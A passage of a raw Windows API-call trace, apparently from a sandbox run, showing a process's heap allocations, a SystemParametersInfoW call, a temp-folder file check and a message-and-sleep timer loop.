returned 0x2e51be0 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0289.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0289.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0289.856] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0289.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0289.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0289.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0289.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e698c8 [0289.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e698c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0289.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0289.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0289.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0289.858] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0289.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0289.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0289.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0289.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0289.858] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0289.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0289.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0289.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0289.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0289.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0289.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0289.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0289.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0289.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0289.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0289.939] FreeLibrary (hLibModule=0x750c0000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0289.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0289.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0289.940] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0289.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.940] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0289.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0289.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0289.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0289.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0289.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0289.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0289.942] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0289.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0289.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0289.943] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0289.943] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0289.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0289.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0289.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0289.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0289.943] timeGetTime () returned 0x118893d [0289.943] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0289.943] Sleep (dwMilliseconds=0xa) [0290.013] timeGetTime () returned 0x1188982 [0290.013] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.013] Sleep (dwMilliseconds=0xa) [0290.082] timeGetTime () returned 0x11889c8 [0290.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.083] Sleep (dwMilliseconds=0xa) [0290.165] timeGetTime () returned 0x1188a1a [0290.165] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.165] Sleep (dwMilliseconds=0xa) [0290.237] timeGetTime () returned 0x1188a62 [0290.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.237] Sleep (dwMilliseconds=0xa) [0290.320] timeGetTime () returned 0x1188ab5 [0290.320] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.320] Sleep (dwMilliseconds=0xa) [0290.373] timeGetTime () returned 0x1188aea [0290.373] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.373] Sleep (dwMilliseconds=0xa) [0290.568] timeGetTime () returned 0x1188bad [0290.568] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0290.568] TranslateMessage (lpMsg=0x8cf798) returned 0 [0290.568] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0290.568] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0290.568] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0290.568] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.568] Sleep (dwMilliseconds=0xa) [0290.617] timeGetTime () returned 0x1188bdf [0290.617] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.617] Sleep (dwMilliseconds=0xa) [0290.657] timeGetTime () returned 0x1188c06 [0290.657] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.657] Sleep (dwMilliseconds=0xa) [0290.708] timeGetTime () returned 0x1188c39 [0290.708] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.708] Sleep (dwMilliseconds=0xa) [0290.749] timeGetTime () returned 0x1188c62 [0290.749] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.749] Sleep (dwMilliseconds=0xa) [0290.793] timeGetTime () returned 0x1188c8e [0290.793] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.793] Sleep (dwMilliseconds=0xa) [0290.838] timeGetTime () returned 0x1188cbb [0290.838] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.838] Sleep (dwMilliseconds=0xa) [0290.875] timeGetTime () returned 0x1188ce0 [0290.875] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.875] Sleep (dwMilliseconds=0xa) [0290.933] timeGetTime () returned 0x1188d1b [0290.933] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0290.933] Sleep (dwMilliseconds=0xa) [0290.996] timeGetTime () returned 0x1188d59 [0290.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0290.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0290.996] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0290.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 